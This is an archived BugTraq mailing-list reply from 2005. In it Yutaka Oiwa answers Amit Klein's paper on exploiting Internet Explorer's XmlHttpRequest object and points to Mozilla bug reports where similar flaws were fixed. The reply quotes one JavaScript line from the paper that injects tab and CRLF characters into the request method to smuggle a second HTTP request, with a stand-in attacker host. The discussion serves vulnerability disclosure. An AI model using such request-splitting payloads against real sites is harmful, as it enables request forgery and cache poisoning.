BugTraq
"Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Sep 24 2005 05:50PM
Amit Klein (AKsecurity) (aksecurity hotpop com) (1 replies)
Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Sep 27 2005 12:34PM
Yutaka OIWA (y oiwa aist go jp)
Hello Amit,

"Amit Klein (AKsecurity)" <aksecurity (at) hotpop (dot) com [email concealed]> writes:

> x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
> /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
> .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
> /1.0\r\nFoobar:","http://www.attacker.site/",false);

This kind of bugs are already fixed in recent Mozilla browsers,
as shown in your reference [4].

> [4] "setRequestHeader can be exploited using newline characters",
> Bugzilla bug 297078
> https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and
> "XMLHttpRequest allows dangerous request headers to be set",
> Bugzilla bug 302263
> https://bugzilla.mozilla.org/show_bug.cgi?id=302263

see comment #15 of bug 297078.

https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15

--
Yutaka OIWA Research Center for Information Security
National Institute of Advanced Industrial Science and Technology (AIST)
Mail addresses: <y.oiwa (at) aist.go (dot) jp [email concealed]>, <yutaka (at) oiwa (dot) jp [email concealed]>
OpenPGP: id[995DD3E1] fp[3C21 17D0 D953 77D3 02D7 4FEC 4754 40C1 995D D3E1]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus